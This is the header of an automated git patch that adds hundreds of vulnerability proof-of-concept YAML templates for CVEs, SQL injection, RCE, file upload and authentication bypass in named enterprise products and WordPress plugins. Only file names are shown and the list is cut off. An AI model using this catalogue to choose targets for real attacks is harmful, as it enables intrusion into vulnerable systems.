From 62bad0f3af601e1f9966e20037b04c92679757d9 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Sat, 14 Dec 2024 12:40:31 +0000
Subject: [PATCH] 20241214

---
 date.txt | 2 +-
 poc.txt | 359 ++++++++++++++++++
 poc/auth/fanwei-Ecology-LoginSSO-sqli.yaml | 29 ++
 .../hamlintek-ISS-7000-login_handler-rce.yaml | 22 ++
 ...ogin-77ccffccfac1bb6eac46823913cc705c.yaml | 59 +++
 ...yuanyun_ERP_GetErpConfig_unauthorized.yaml | 20 +
 ...-PKIAuthenticationPlugin-admin-bypass.yaml | 21 +
 .../yongyou-BIP-yonbiplogin-fileread.yaml | 19 +
 poc/backup/indeed-wp-superbackup.yaml | 59 +++
 ...-Ecology-browser-sqli-CNVD-2023-12632.yaml | 28 ++
 ...yuanyun_ERP_GetErpConfig_unauthorized.yaml | 20 +
 poc/cve/CVE-2011-5107-2102.yaml | 29 ++
 poc/cve/CVE-2014-4536-2354.yaml | 41 ++
 poc/cve/CVE-2014-9094-2422.yaml | 29 ++
 poc/cve/CVE-2015-2807-2500.yaml | 32 ++
 poc/cve/CVE-2017-17043-2977.yaml | 35 ++
 poc/cve/CVE-2019-25221.yaml | 59 +++
 poc/cve/CVE-2020-11023.yaml | 59 +++
 poc/cve/CVE-2020-24186-4793.yaml | 83 ++++
 poc/cve/CVE-2020-35234-5026.yaml | 45 +++
 poc/cve/CVE-2021-25111-5802.yaml | 26 ++
 poc/cve/CVE-2022-1597-6652.yaml | 74 ++++
 poc/cve/CVE-2022-1598-6654.yaml | 53 +++
 poc/cve/CVE-2023-24407.yaml | 59 +++
 poc/cve/CVE-2023-49196.yaml | 59 +++
 poc/cve/CVE-2024-10010.yaml | 59 +++
 poc/cve/CVE-2024-10104.yaml | 59 +++
 poc/cve/CVE-2024-10146.yaml | 59 +++
 poc/cve/CVE-2024-10471.yaml | 59 +++
 poc/cve/CVE-2024-10473.yaml | 59 +++
 poc/cve/CVE-2024-10480.yaml | 59 +++
 poc/cve/CVE-2024-10493.yaml | 59 +++
 poc/cve/CVE-2024-10510.yaml | 59 +++
 poc/cve/CVE-2024-10517.yaml | 59 +++
 poc/cve/CVE-2024-10518.yaml | 59 +++
 poc/cve/CVE-2024-10568.yaml | 59 +++
 ...0646-6a5f696424113cce85ff733ae3bc98b0.yaml | 59 +++
 ...0690-9e8bc3f90f0d2a14268c428a04063b03.yaml | 59 +++
 poc/cve/CVE-2024-10704.yaml | 59 +++
 poc/cve/CVE-2024-10708.yaml | 59 +++
 poc/cve/CVE-2024-10783.yaml | 59 +++
 poc/cve/CVE-2024-10893.yaml | 59 +++
 poc/cve/CVE-2024-10896.yaml | 59 +++
 poc/cve/CVE-2024-10980.yaml | 59 +++
 poc/cve/CVE-2024-11012.yaml | 59 +++
 ...1095-b0165142a699db32c27db406fb189dac.yaml | 59 +++
 poc/cve/CVE-2024-11107.yaml | 59 +++
 poc/cve/CVE-2024-11140.yaml | 59 +++
 poc/cve/CVE-2024-11183.yaml | 59 +++
 poc/cve/CVE-2024-11190.yaml | 59 +++
 poc/cve/CVE-2024-11221.yaml | 59 +++
 poc/cve/CVE-2024-11275.yaml | 59 +++
 ...1367-b568504cdda8a316e2c2495192fa3b93.yaml | 59 +++
 poc/cve/CVE-2024-11372.yaml | 59 +++
 poc/cve/CVE-2024-11373.yaml | 59 +++
 ...1417-e70cae6d6cbde8c3b8b47fc874959a2c.yaml | 59 +++
 ...1462-8df69847f3be73a75d55847984a2d955.yaml | 59 +++
 poc/cve/CVE-2024-11502.yaml | 59 +++
 ...1710-6b40285fd670b260b17a7200ea944ea1.yaml | 59 +++
 ...1711-3280cdf3709d95c508956c22254e4c2e.yaml | 59 +++
 ...1712-c31e31d712beebffc1ade29e9e31eb47.yaml | 59 +++
 ...1713-3ce068c28a3bf30675cdafd7af7432b5.yaml | 59 +++
 ...1714-6e3bac814e83994dd0e0e3a82cd823a9.yaml | 59 +++
 ...1715-f8ac92a9956b6a02eeac6f3837fff40b.yaml | 59 +++
 ...1720-d0f4b1ce743d359b9844d3054e4a5af9.yaml | 59 +++
 ...1721-dc2aa37d169a99daa955380439331a02.yaml | 59 +++
 ...1751-fd6fb920fe0d64ca3888bb1674349134.yaml | 59 +++
 ...1752-932bb2de288ef26bc4c101684c7cb531.yaml | 59 +++
 poc/cve/CVE-2024-11754.yaml | 59 +++
 ...1755-935ec9fc2ee3b23b1ccc21acca8e8636.yaml | 59 +++
 ...1759-d6a0a8830fda868046b3c5319b1e8383.yaml | 59 +++
 ...1763-abc5d805ccc6f324bc8947787eeff644.yaml | 59 +++
 poc/cve/CVE-2024-11767.yaml | 59 +++
 ...1770-8a21d7ed25582479ddfaa17a6cbfc663.yaml | 59 +++
 poc/cve/CVE-2024-11809.yaml | 59 +++
 poc/cve/CVE-2024-11827.yaml | 59 +++
 poc/cve/CVE-2024-11832.yaml | 59 +++
 poc/cve/CVE-2024-11841.yaml | 59 +++
 ...1855-c68a0514b5572dba40197a1e12cc708d.yaml | 59 +++
 ...1865-93d2fdcff3de5132748a3e57487e9324.yaml | 59 +++
 ...1867-3bf808c90c9dd0a57945a67a217dbe53.yaml | 59 +++
 ...1869-50ed005605a356d0d3b23edb855715d9.yaml | 59 +++
 ...1873-f2f885a30706e264c4c12ffd5cfc514f.yaml | 59 +++
 ...1876-9cd3f7953a8fa340c5fdf6ebfeb9bc83.yaml | 59 +++
 ...1877-22cf6fc826469df1501c9a0f0ba687ca.yaml | 59 +++
 ...1879-59310d2dceea2163a5176b76507b44eb.yaml | 59 +++
 ...1883-4e04efa11f08a8fa78ba4ddbbc4a6849.yaml | 59 +++
 ...1884-55f612c1021e30ed6e11056cd7729031.yaml | 59 +++
 ...1888-153488a3d489b9c026a53628a1f85eb1.yaml | 59 +++
 ...1889-7b0c0efb6dca65612e5ac372a5bd0eb3.yaml | 59 +++
 ...1894-88cc7cbdaa700b8fa41789611b2b65cf.yaml | 59 +++
 poc/cve/CVE-2024-11910.yaml | 59 +++
 poc/cve/CVE-2024-11911.yaml | 59 +++
 poc/cve/CVE-2024-12015.yaml | 59 +++
 poc/cve/CVE-2024-12042.yaml | 59 +++
 poc/cve/CVE-2024-12300.yaml | 59 +++
 poc/cve/CVE-2024-12309.yaml | 59 +++
 ...2411-f0a38e379813866e02459d465ef6affd.yaml | 59 +++
 poc/cve/CVE-2024-12414.yaml | 59 +++
 poc/cve/CVE-2024-12417.yaml | 59 +++
 poc/cve/CVE-2024-12420.yaml | 59 +++
 poc/cve/CVE-2024-12421.yaml | 59 +++
 ...2422-aeceb3fb45bf879d6b9a1d0dc516f06c.yaml | 59 +++
 ...2446-2affa83d9110434c8964fc4fe186651f.yaml | 59 +++
 ...2447-f170b29c68bc4a2c96b04066f7af171d.yaml | 59 +++
 ...2448-b0024901f823c199e5df7414f136f048.yaml | 59 +++
 ...2458-e6b90e547e05531a7e2ba9dd1b97c927.yaml | 59 +++
 ...2459-1c8f2c123589ae3f3e53f13d47253fcf.yaml | 59 +++
 poc/cve/CVE-2024-12465.yaml | 59 +++
 ...2474-143276e3178f42c70ef45aed9f8f19ab.yaml | 59 +++
 ...2501-c27faf539f1a53d9009e9c3a53602e7a.yaml | 59 +++
 ...2502-1f199f73b33e699daa4c51027e49df2e.yaml | 59 +++
 ...2517-efd628a1954edd29546cb9041fe9b427.yaml | 59 +++
 ...2523-3e0bf521f24a7f7e87f4a5a124f0141d.yaml | 59 +++
 ...2555-5cbce38a9099186c24f323bfe5404451.yaml | 59 +++
 poc/cve/CVE-2024-12572.yaml | 59 +++
 poc/cve/CVE-2024-12574.yaml | 59 +++
 ...2578-55a6532fce1626d6ca01169c30129bf3.yaml | 59 +++
 poc/cve/CVE-2024-12579.yaml | 59 +++
 poc/cve/CVE-2024-12581.yaml | 59 +++
 ...2628-d21dcffe48f9c4b21314ab529a797a81.yaml | 59 +++
 poc/cve/CVE-2024-37250.yaml | 59 +++
 poc/cve/CVE-2024-43222.yaml | 59 +++
 poc/cve/CVE-2024-43300.yaml | 59 +++
 poc/cve/CVE-2024-43968.yaml | 59 +++
 poc/cve/CVE-2024-47321.yaml | 59 +++
 poc/cve/CVE-2024-49323.yaml | 59 +++
 poc/cve/CVE-2024-49334.yaml | 59 +++
 poc/cve/CVE-2024-5029.yaml | 59 +++
 poc/cve/CVE-2024-50423.yaml | 59 +++
 poc/cve/CVE-2024-50504.yaml | 59 +++
 poc/cve/CVE-2024-50506.yaml | 59 +++
 poc/cve/CVE-2024-50507.yaml | 59 +++
 poc/cve/CVE-2024-50508.yaml | 59 +++
 poc/cve/CVE-2024-50509.yaml | 59 +++
 poc/cve/CVE-2024-50510.yaml | 59 +++
 poc/cve/CVE-2024-50511.yaml | 59 +++
 poc/cve/CVE-2024-50512.yaml | 59 +++
 poc/cve/CVE-2024-50513.yaml | 59 +++
 poc/cve/CVE-2024-50514.yaml | 59 +++
 poc/cve/CVE-2024-50515.yaml | 59 +++
 poc/cve/CVE-2024-50516.yaml | 59 +++
 poc/cve/CVE-2024-50550.yaml | 59 +++
 poc/cve/CVE-2024-51615.yaml | 59 +++
 poc/cve/CVE-2024-51647.yaml | 59 +++
 poc/cve/CVE-2024-51792.yaml | 59 +++
 poc/cve/CVE-2024-51815.yaml | 59 +++
 poc/cve/CVE-2024-53278.yaml | 59 +++
 poc/cve/CVE-2024-53725.yaml | 59 +++
 poc/cve/CVE-2024-53729.yaml | 59 +++
 poc/cve/CVE-2024-53737.yaml | 59 +++
 poc/cve/CVE-2024-53738.yaml | 59 +++
 poc/cve/CVE-2024-53739.yaml | 59 +++
 poc/cve/CVE-2024-53803.yaml | 59 +++
 poc/cve/CVE-2024-53804.yaml | 59 +++
 poc/cve/CVE-2024-53805.yaml | 59 +++
 poc/cve/CVE-2024-53807.yaml | 59 +++
 poc/cve/CVE-2024-53808.yaml | 59 +++
 poc/cve/CVE-2024-53812.yaml | 59 +++
 poc/cve/CVE-2024-53815.yaml | 59 +++
 poc/cve/CVE-2024-53817.yaml | 59 +++
 poc/cve/CVE-2024-53818.yaml | 59 +++
 poc/cve/CVE-2024-53819.yaml | 59 +++
 poc/cve/CVE-2024-53823.yaml | 59 +++
 poc/cve/CVE-2024-53824.yaml | 59 +++
 poc/cve/CVE-2024-53826.yaml | 59 +++
 poc/cve/CVE-2024-54206.yaml | 59 +++
 poc/cve/CVE-2024-54207.yaml | 59 +++
 poc/cve/CVE-2024-54212.yaml | 59 +++
 poc/cve/CVE-2024-54213.yaml | 59 +++
 poc/cve/CVE-2024-54214.yaml | 59 +++
 poc/cve/CVE-2024-54215.yaml | 59 +++
 poc/cve/CVE-2024-54216.yaml | 59 +++
 poc/cve/CVE-2024-54217.yaml | 59 +++
 poc/cve/CVE-2024-54218.yaml | 59 +++
 poc/cve/CVE-2024-54219.yaml | 59 +++
 poc/cve/CVE-2024-54220.yaml | 59 +++
 poc/cve/CVE-2024-54221.yaml | 59 +++
 poc/cve/CVE-2024-54223.yaml | 59 +++
 poc/cve/CVE-2024-54224.yaml | 59 +++
 poc/cve/CVE-2024-54225.yaml | 59 +++
 poc/cve/CVE-2024-54226.yaml | 59 +++
 poc/cve/CVE-2024-54227.yaml | 59 +++
 poc/cve/CVE-2024-54228.yaml | 59 +++
 poc/cve/CVE-2024-54230.yaml | 59 +++
 poc/cve/CVE-2024-54231.yaml | 59 +++
 poc/cve/CVE-2024-54232.yaml | 59 +++
 poc/cve/CVE-2024-54247.yaml | 59 +++
 poc/cve/CVE-2024-54250.yaml | 59 +++
 poc/cve/CVE-2024-54251.yaml | 59 +++
 poc/cve/CVE-2024-54253.yaml | 59 +++
 poc/cve/CVE-2024-54255.yaml | 59 +++
 poc/cve/CVE-2024-54260.yaml | 59 +++
 poc/cve/CVE-2024-7982.yaml | 59 +++
 poc/cve/CVE-2024-8157.yaml | 59 +++
 poc/cve/CVE-2024-8378.yaml | 59 +++
 poc/cve/CVE-2024-8444.yaml | 59 +++
 poc/cve/CVE-2024-8625.yaml | 59 +++
 ...9111-581fc93879c1c54ef26503d9dcc6ddcf.yaml | 59 +++
 poc/cve/CVE-2024-9290.yaml | 59 +++
 poc/cve/CVE-2024-9422.yaml | 59 +++
 poc/cve/CVE-2024-9428.yaml | 59 +++
 poc/cve/CVE-2024-9608.yaml | 59 +++
 poc/cve/CVE-2024-9651.yaml | 59 +++
 ...9698-dbff952933f5639b29a1b80e2c7a52b6.yaml | 59 +++
 poc/cve/CVE-2024-9768.yaml | 59 +++
 poc/cve/CVE-2024-9828.yaml | 59 +++
 poc/cve/CVE-2024-9835.yaml | 59 +++
 poc/cve/CVE-2024-9836.yaml | 59 +++
 poc/cve/CVE-2024-9934.yaml | 59 +++
 ...boot-getTotalData-sqli-CVE-2024-48307.yaml | 23 ++
 poc/detect/adbuddy-adblocker-detection.yaml | 59 +++
 ...down-afc1b693115a4259c31be875ae4878db.yaml | 59 +++
 .../cyberpanel-upgrademysqlstatus-rce.yaml | 24 ++
 .../AnyShare-Usrm_GetAllUsers-infoleak.yaml | 21 +
 poc/other/abcbiz-addons.yaml | 59 +++
 ...ment-37cf54b4fd530e8cbe84be3c76ac823a.yaml | 59 +++
 ...ment-e002b76cae1c5fe698d73bad818d1658.yaml | 59 +++
 poc/other/aio-contact.yaml | 59 +++
 poc/other/all-in-one-slider.yaml | 59 +++
 poc/other/alphabetical-list.yaml | 59 +++
 ...tion-a3308f3b5497bd4ba2d82def5ce6916c.yaml | 59 +++
 poc/other/blizzard-quotes.yaml | 59 +++
 ...ache-b25e0848713a993a19d7a570188681d3.yaml | 59 +++
 poc/other/booking-system-trafft.yaml | 59 +++
 ...ents-ae0876cbc8a6ea5bc63f81816ddd03a6.yaml | 59 +++
 ...ukza-1d18f7cdcaadc800f7e99e165e820759.yaml | 59 +++
 poc/other/bulk-role-change.yaml | 59 +++
 poc/other/cb-logo-slider.yaml | 59 +++
 ...olio-99848fed06847f56568685ec4d7abf53.yaml | 59 +++
 ...mbed-078fbbdf831b8258d6e8b451d9e7fb0e.yaml | 59 +++
 ...port-3d9ed4f73a1e8e89ff28ad42207f57cc.yaml | 59 +++
 poc/other/designer.yaml | 59 +++
 poc/other/dsdownloadlist.yaml | 59 +++
 ...eeno-57163addaabbee05984ca77e6d31881e.yaml | 59 +++
 poc/other/fat-services-booking.yaml | 59 +++
 ...form-73d12813260178303738b5378f138bfb.yaml | 59 +++
 ...creen-page-background-image-slideshow.yaml | 59 +++
 ...code-9c361274065595fa7c1b34cfc52539a1.yaml | 59 +++
 ...code-b22e11dd16a8eba4c44d1ec8159b3556.yaml | 59 +++
 ...mbed-2234b2001bef09d3310372cf737d335d.yaml | 59 +++
 poc/other/gmw-premium-settings.yaml | 59 +++
 poc/other/hello-in-all-languages.yaml | 59 +++
 poc/other/hits-counter.yaml | 59 +++
 ...ents-fbff3ca801016ea3ccdd49c17eb80e43.yaml | 59 +++
 ...-oaplusrangedownloadfile-filedownload.yaml | 19 +
 poc/other/jiusi-oa-dl-fileread.yaml | 19 +
 poc/other/jquery-manager.yaml | 59 +++
 .../kingdee_eas_pdfViewLocal_fileread.yaml | 19 +
 .../kingview-KingPortal-img-fileread.yaml | 19 +
 ...dget-ce4441524b592e785043e6070388f53a.yaml | 59 +++
 ...nfts-63e1fa011074b96657eb8fc01827c46b.yaml | 59 +++
 poc/other/logs-de-connexion.yaml | 59 +++
 poc/other/newsmanapp.yaml | 59 +++
 poc/other/newspack-plugin.yaml | 59 +++
 poc/other/notibar.yaml | 59 +++
 poc/other/ootb-openstreetmap.yaml | 59 +++
 poc/other/planning-center-online-giving.yaml | 59 +++
 ...lezi-4a635b36fc2f020e6e97470ee9033e55.yaml | 59 +++
 ...-pdf-8ab47ff832f5f5cf5ba543f690973fee.yaml | 59 +++
 ...ider-c7b7350193feff134087fae14530c8a3.yaml | 59 +++
 ...iews-6353d59c8166d0c7835a56c9603f6772.yaml | 59 +++
 poc/other/primer-mydata.yaml | 59 +++
 .../products-stock-manager-with-excel.yaml | 59 +++
 .../property-hive-stamp-duty-calculator.yaml | 59 +++
 poc/other/revy.yaml | 59 +++
 poc/other/rrdevs-for-elementor.yaml | 59 +++
 ...ntor-31466df2cf677a943b18b87d140554bf.yaml | 59 +++
 ...ator-64cca06d1166ced2ac235d17d2f88e70.yaml | 59 +++
 ...ster-38242ca08bf2b38877007cc96b7c92a1.yaml | 59 +++
 poc/other/svg-shortcode.yaml | 59 +++
 poc/other/sweetdate.yaml | 59 +++
 ...aker-daf9e2cf38c5806dd492be7fef17b720.yaml | 59 +++
 ...over-cde275ba1470f5ed86bd89d6dd9707b4.yaml | 59 +++
 ...nker-89aed934f46868a1f2162bc8d7aacc36.yaml | 59 +++
 poc/other/themify-store-locator.yaml | 59 +++
 .../tianrongxin-TopSAG-download-download.yaml | 23 ++
 ...stem-5a3ee1f11c4a6d8e9eba3cf37c043750.yaml | 59 +++
 poc/other/unlock-addons-for-elementor.yaml | 59 +++
 ...ents-134a8cc9ff775949b36d0becbb4ef51d.yaml | 59 +++
 ...wangyuxingyun_vpn_client_filedownload.yaml | 30 ++
 ...code-ba5e554357f7d9eec7e0e2ce4da9ba5f.yaml | 59 +++
 poc/other/woo-product-excel-importer.yaml | 59 +++
 poc/other/wot-elementor-widgets.yaml | 59 +++
 ...ou-BIP-getolapconnectionlist-infoleak.yaml | 19 +
 .../yonyou-UFIDA-NC-download-fileread.yaml | 19 +
 .../D-Link_DNS-320-account_mgr-rce.yaml | 25 ++
 .../D-Link_DNS-320-scan_dsk-rce.yaml | 25 ++
 .../ar-for-woocommerce.yaml | 59 +++
 .../cyberpanel-upgrademysqlstatus-rce.yaml | 24 ++
 ...down-a5f6ea64e6ade169785eed830efe7d5f.yaml | 59 +++
 .../hamlintek-ISS-7000-login_handler-rce.yaml | 22 ++
 .../kingdee_eas_apputil_rce.yaml | 20 +
 .../meite-crm-sync_emp_weixin-rce.yaml | 19 +
 .../min-and-max-quantity-for-woocommerce.yaml | 59 +++
 .../ni-woocommerce-order-export.yaml | 59 +++
 .../prodigy-commerce.yaml | 59 +++
 ...anrongxin-yunweishenji-synRequest-rce.yaml | 33 ++
 ...erce-product-excel-importer-bulk-edit.yaml | 59 +++
 .../woocommerce-myparcel.yaml | 59 +++
 ...arch-19b216f4cb81ff6b86947c3420c19a79.yaml | 59 +++
 ...arch-cb1ebc1aa3b7aa8c2bfe19c90a10af1b.yaml | 59 +++
 ...1095-b0165142a699db32c27db406fb189dac.yaml | 59 +++
 ...1855-c68a0514b5572dba40197a1e12cc708d.yaml | 59 +++
 ...1867-3bf808c90c9dd0a57945a67a217dbe53.yaml | 59 +++
 ...1869-50ed005605a356d0d3b23edb855715d9.yaml | 59 +++
 ...1883-4e04efa11f08a8fa78ba4ddbbc4a6849.yaml | 59 +++
 ...9698-dbff952933f5639b29a1b80e2c7a52b6.yaml | 59 +++
 poc/sql/adbuddy-adblocker-detection.yaml | 59 +++
 ...core-e44fdb3a4ce9acdbe0ece5ab8b5a4c4a.yaml | 59 +++
 .../cyberpanel-upgrademysqlstatus-rce.yaml | 24 ++
 poc/sql/fanwei-Ecology-LoginSSO-sqli.yaml | 29 ++
 ...-Ecology-browser-sqli-CNVD-2023-12632.yaml | 28 ++
 ...down-afc1b693115a4259c31be875ae4878db.yaml | 59 +++
 ...boot-getTotalData-sqli-CVE-2024-48307.yaml | 23 ++
 poc/sql/movie-database.yaml | 59 +++
 poc/sql/qiwang-ERP-drawGrid-sqli.yaml | 29 ++
 ...ator-03696418e2ddb2e57359bcf1347e1091.yaml | 59 +++
 ...rtal-dc870f31dbdd3ed85cf5c81a865becfd.yaml | 59 +++
 ...-map-696be7426132daf80e136f71893126db.yaml | 59 +++
 poc/sql/yongyou-nc-process-sqli.yaml | 26 ++
 ...yongyou-u8c-cloud-approveservlet-sqli.yaml | 22 ++
 .../zhilink-SRM-quickReceiptDetail-sqli.yaml | 20 +
 .../cyberpanel-upgrademysqlstatus-rce.yaml | 24 ++
 .../fanwei-Ecology-LoginSSO-sqli.yaml | 29 ++
 ...-Ecology-browser-sqli-CNVD-2023-12632.yaml | 28 ++
 ...boot-getTotalData-sqli-CVE-2024-48307.yaml | 23 ++
 .../qiwang-ERP-drawGrid-sqli.yaml | 29 ++
 .../yongyou-nc-process-sqli.yaml | 26 ++
 ...yongyou-u8c-cloud-approveservlet-sqli.yaml | 22 ++
 .../zhilink-SRM-quickReceiptDetail-sqli.yaml | 20 +
 poc/upload/EKing-Base64Upload-fileupload.yaml | 31 ++
 ...et-TPlus-FileUploadHandler-uploadfile.yaml | 36 ++
 ...load-eef332a3e9a940fc24b6a8b85a58d6b7.yaml | 59 +++
 poc/upload/h3c-CAS-CVM-fd-uploadfile.yaml | 42 ++
 .../inspur-GS-UploadListFile-uploadfile.yaml | 39 ++
 ...ia-weixinshangqiang-mobile-fileupload.yaml | 33 ++
 poc/upload/meite-crm-upload-upload.yaml | 58 +++
 poc/upload/nuuo-upload-uploadfile.yaml | 36 ++
 ...anjia-erp-uploadimgnocheck-fileupload.yaml | 45 +++
 .../yongyou-u8c-esnserver-fileupload.yaml | 35 ++
 .../yonyou-U8clouderp-upload-uploadfile.yaml | 27 ++
 ...lanling-oa-hrstaffwebservice-fileread.yaml | 42 ++
 ...erce-product-excel-importer-bulk-edit.yaml | 59 +++
 poc/wordpress/indeed-wp-superbackup.yaml | 59 +++
 poc/wordpress/jlayer-parallax-slider-wp.yaml | 59 +++
 poc/wordpress/jwp-a11y.yaml | 59 +++
 poc/wordpress/real-wp-shop-lite.yaml | 59 +++
 ...users-import-export-with-excel-for-wp.yaml | 59 +++
 ...guru-bb28f01cd39849324f89e02e0f2950e5.yaml | 59 +++
 poc/wordpress/wp-auctions.yaml | 59 +++
 poc/wordpress/wp-donimedia-carousel.yaml | 59 +++
...rtal-0fd8a0f3624a9ac01ba2ce3c3af9b360.yaml | 59 +++ ...rtal-44ca926d802c7e810b6f185672896cf3.yaml | 59 +++ ...rtal-ac656f0515b546b4fd6aadacc13c1a52.yaml | 59 +++ ...rtal-ae4beac744bf60cad4d49b935292f33a.yaml | 59 +++ ...rtal-dc870f31dbdd3ed85cf5c81a865becfd.yaml | 59 +++ ...rtal-fa33fbce4070912e4a2de446cc7f9493.yaml | 59 +++ ...r-50-b363eafeebe4e86c4b8a3cfae536824b.yaml | 59 +++ poc/wordpress/wp-tithely.yaml | 59 +++ poc/wordpress/wpcasa.yaml | 59 +++ 361 files changed, 19718 insertions(+), 1 deletion(-) create mode 100644 poc/auth/fanwei-Ecology-LoginSSO-sqli.yaml create mode 100644 poc/auth/hamlintek-ISS-7000-login_handler-rce.yaml create mode 100644 poc/auth/ider-login-77ccffccfac1bb6eac46823913cc705c.yaml create mode 100644 poc/auth/mingyuanyun_ERP_GetErpConfig_unauthorized.yaml create mode 100644 poc/auth/solr-PKIAuthenticationPlugin-admin-bypass.yaml create mode 100644 poc/auth/yongyou-BIP-yonbiplogin-fileread.yaml create mode 100644 poc/backup/indeed-wp-superbackup.yaml create mode 100644 poc/cnvd/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml create mode 100644 poc/config/mingyuanyun_ERP_GetErpConfig_unauthorized.yaml create mode 100644 poc/cve/CVE-2011-5107-2102.yaml create mode 100644 poc/cve/CVE-2014-4536-2354.yaml create mode 100644 poc/cve/CVE-2014-9094-2422.yaml create mode 100644 poc/cve/CVE-2015-2807-2500.yaml create mode 100644 poc/cve/CVE-2017-17043-2977.yaml create mode 100644 poc/cve/CVE-2019-25221.yaml create mode 100644 poc/cve/CVE-2020-11023.yaml create mode 100644 poc/cve/CVE-2020-24186-4793.yaml create mode 100644 poc/cve/CVE-2020-35234-5026.yaml create mode 100644 poc/cve/CVE-2021-25111-5802.yaml create mode 100644 poc/cve/CVE-2022-1597-6652.yaml create mode 100644 poc/cve/CVE-2022-1598-6654.yaml create mode 100644 poc/cve/CVE-2023-24407.yaml create mode 100644 poc/cve/CVE-2023-49196.yaml create mode 100644 poc/cve/CVE-2024-10010.yaml create mode 100644 poc/cve/CVE-2024-10104.yaml create mode 100644 poc/cve/CVE-2024-10146.yaml create 
mode 100644 poc/cve/CVE-2024-10471.yaml create mode 100644 poc/cve/CVE-2024-10473.yaml create mode 100644 poc/cve/CVE-2024-10480.yaml create mode 100644 poc/cve/CVE-2024-10493.yaml create mode 100644 poc/cve/CVE-2024-10510.yaml create mode 100644 poc/cve/CVE-2024-10517.yaml create mode 100644 poc/cve/CVE-2024-10518.yaml create mode 100644 poc/cve/CVE-2024-10568.yaml create mode 100644 poc/cve/CVE-2024-10646-6a5f696424113cce85ff733ae3bc98b0.yaml create mode 100644 poc/cve/CVE-2024-10690-9e8bc3f90f0d2a14268c428a04063b03.yaml create mode 100644 poc/cve/CVE-2024-10704.yaml create mode 100644 poc/cve/CVE-2024-10708.yaml create mode 100644 poc/cve/CVE-2024-10783.yaml create mode 100644 poc/cve/CVE-2024-10893.yaml create mode 100644 poc/cve/CVE-2024-10896.yaml create mode 100644 poc/cve/CVE-2024-10980.yaml create mode 100644 poc/cve/CVE-2024-11012.yaml create mode 100644 poc/cve/CVE-2024-11095-b0165142a699db32c27db406fb189dac.yaml create mode 100644 poc/cve/CVE-2024-11107.yaml create mode 100644 poc/cve/CVE-2024-11140.yaml create mode 100644 poc/cve/CVE-2024-11183.yaml create mode 100644 poc/cve/CVE-2024-11190.yaml create mode 100644 poc/cve/CVE-2024-11221.yaml create mode 100644 poc/cve/CVE-2024-11275.yaml create mode 100644 poc/cve/CVE-2024-11367-b568504cdda8a316e2c2495192fa3b93.yaml create mode 100644 poc/cve/CVE-2024-11372.yaml create mode 100644 poc/cve/CVE-2024-11373.yaml create mode 100644 poc/cve/CVE-2024-11417-e70cae6d6cbde8c3b8b47fc874959a2c.yaml create mode 100644 poc/cve/CVE-2024-11462-8df69847f3be73a75d55847984a2d955.yaml create mode 100644 poc/cve/CVE-2024-11502.yaml create mode 100644 poc/cve/CVE-2024-11710-6b40285fd670b260b17a7200ea944ea1.yaml create mode 100644 poc/cve/CVE-2024-11711-3280cdf3709d95c508956c22254e4c2e.yaml create mode 100644 poc/cve/CVE-2024-11712-c31e31d712beebffc1ade29e9e31eb47.yaml create mode 100644 poc/cve/CVE-2024-11713-3ce068c28a3bf30675cdafd7af7432b5.yaml create mode 100644 
poc/cve/CVE-2024-11714-6e3bac814e83994dd0e0e3a82cd823a9.yaml create mode 100644 poc/cve/CVE-2024-11715-f8ac92a9956b6a02eeac6f3837fff40b.yaml create mode 100644 poc/cve/CVE-2024-11720-d0f4b1ce743d359b9844d3054e4a5af9.yaml create mode 100644 poc/cve/CVE-2024-11721-dc2aa37d169a99daa955380439331a02.yaml create mode 100644 poc/cve/CVE-2024-11751-fd6fb920fe0d64ca3888bb1674349134.yaml create mode 100644 poc/cve/CVE-2024-11752-932bb2de288ef26bc4c101684c7cb531.yaml create mode 100644 poc/cve/CVE-2024-11754.yaml create mode 100644 poc/cve/CVE-2024-11755-935ec9fc2ee3b23b1ccc21acca8e8636.yaml create mode 100644 poc/cve/CVE-2024-11759-d6a0a8830fda868046b3c5319b1e8383.yaml create mode 100644 poc/cve/CVE-2024-11763-abc5d805ccc6f324bc8947787eeff644.yaml create mode 100644 poc/cve/CVE-2024-11767.yaml create mode 100644 poc/cve/CVE-2024-11770-8a21d7ed25582479ddfaa17a6cbfc663.yaml create mode 100644 poc/cve/CVE-2024-11809.yaml create mode 100644 poc/cve/CVE-2024-11827.yaml create mode 100644 poc/cve/CVE-2024-11832.yaml create mode 100644 poc/cve/CVE-2024-11841.yaml create mode 100644 poc/cve/CVE-2024-11855-c68a0514b5572dba40197a1e12cc708d.yaml create mode 100644 poc/cve/CVE-2024-11865-93d2fdcff3de5132748a3e57487e9324.yaml create mode 100644 poc/cve/CVE-2024-11867-3bf808c90c9dd0a57945a67a217dbe53.yaml create mode 100644 poc/cve/CVE-2024-11869-50ed005605a356d0d3b23edb855715d9.yaml create mode 100644 poc/cve/CVE-2024-11873-f2f885a30706e264c4c12ffd5cfc514f.yaml create mode 100644 poc/cve/CVE-2024-11876-9cd3f7953a8fa340c5fdf6ebfeb9bc83.yaml create mode 100644 poc/cve/CVE-2024-11877-22cf6fc826469df1501c9a0f0ba687ca.yaml create mode 100644 poc/cve/CVE-2024-11879-59310d2dceea2163a5176b76507b44eb.yaml create mode 100644 poc/cve/CVE-2024-11883-4e04efa11f08a8fa78ba4ddbbc4a6849.yaml create mode 100644 poc/cve/CVE-2024-11884-55f612c1021e30ed6e11056cd7729031.yaml create mode 100644 poc/cve/CVE-2024-11888-153488a3d489b9c026a53628a1f85eb1.yaml create mode 100644 
poc/cve/CVE-2024-11889-7b0c0efb6dca65612e5ac372a5bd0eb3.yaml create mode 100644 poc/cve/CVE-2024-11894-88cc7cbdaa700b8fa41789611b2b65cf.yaml create mode 100644 poc/cve/CVE-2024-11910.yaml create mode 100644 poc/cve/CVE-2024-11911.yaml create mode 100644 poc/cve/CVE-2024-12015.yaml create mode 100644 poc/cve/CVE-2024-12042.yaml create mode 100644 poc/cve/CVE-2024-12300.yaml create mode 100644 poc/cve/CVE-2024-12309.yaml create mode 100644 poc/cve/CVE-2024-12411-f0a38e379813866e02459d465ef6affd.yaml create mode 100644 poc/cve/CVE-2024-12414.yaml create mode 100644 poc/cve/CVE-2024-12417.yaml create mode 100644 poc/cve/CVE-2024-12420.yaml create mode 100644 poc/cve/CVE-2024-12421.yaml create mode 100644 poc/cve/CVE-2024-12422-aeceb3fb45bf879d6b9a1d0dc516f06c.yaml create mode 100644 poc/cve/CVE-2024-12446-2affa83d9110434c8964fc4fe186651f.yaml create mode 100644 